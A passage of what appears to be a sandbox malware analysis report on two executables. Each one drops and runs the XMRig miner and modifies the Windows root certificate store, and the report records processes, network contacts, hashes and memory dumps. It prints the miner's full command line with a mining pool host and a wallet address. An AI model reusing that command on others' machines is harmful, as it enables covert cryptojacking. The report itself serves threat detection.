C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4272 wrote to memory of 2904 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4272 wrote to memory of 2904 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| BE | 88.221.83.240:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2904-14-0x000001EB5BDB0000-0x000001EB5BDD0000-memory.dmp
memory/2904-15-0x000001EB5D7B0000-0x000001EB5D7D0000-memory.dmp
memory/2904-16-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-17-0x000001EB5D7D0000-0x000001EB5D7F0000-memory.dmp
memory/2904-18-0x000001EB5D7F0000-0x000001EB5D810000-memory.dmp
memory/2904-19-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-20-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-23-0x000001EB5D7F0000-0x000001EB5D810000-memory.dmp
memory/2904-22-0x000001EB5D7D0000-0x000001EB5D7F0000-memory.dmp
memory/2904-21-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-24-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-25-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-26-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-27-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-28-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-29-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-30-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-31-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-32-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-33-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-34-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-35-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-36-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-37-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-38-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-39-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-40-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-41-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-42-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-43-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-44-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-45-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-46-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-47-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-48-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-49-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-50-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-51-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-52-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-53-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-54-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-55-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-56-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-57-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-58-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-59-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-60-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-61-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-62-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-63-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-64-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-65-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-66-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-67-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-68-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-69-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-70-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-71-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-72-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-73-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-74-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-75-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-76-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-77-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-78-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-79-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-80-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-81-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
memory/2904-82-0x00007FF7A6F80000-0x00007FF7A7A83000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:42
Platform
win10v2004-20240611-en
Max time kernel
1793s
Max time network
1805s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1352 wrote to memory of 4596 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1352 wrote to memory of 4596 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4416,i,4778049104057176787,6631751660692402210,262144 --variations-seed-version --mojo-platform-channel-handle=3752 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4888,i,4778049104057176787,6631751660692402210,262144 --variations-seed-version --mojo-platform-channel-handle=1404 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| NL | 52.111.243.30:443 | tcp | |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.150.79.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4596-14-0x000001D9435F0000-0x000001D943610000-memory.dmp
memory/4596-15-0x000001D943640000-0x000001D943660000-memory.dmp
memory/4596-16-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-18-0x000001D944F30000-0x000001D944F50000-memory.dmp
memory/4596-17-0x000001D944F10000-0x000001D944F30000-memory.dmp
memory/4596-19-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-20-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-21-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-22-0x000001D944F10000-0x000001D944F30000-memory.dmp
memory/4596-23-0x000001D944F30000-0x000001D944F50000-memory.dmp
memory/4596-24-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-25-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-26-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-27-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-28-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-29-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-30-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-31-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-32-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-33-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-34-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-35-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-36-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-37-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-38-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-39-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-40-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-41-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-42-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-43-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-44-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-45-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-46-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-47-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-48-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-49-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-50-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-51-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-52-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-53-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-54-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-55-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-56-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-57-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-58-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
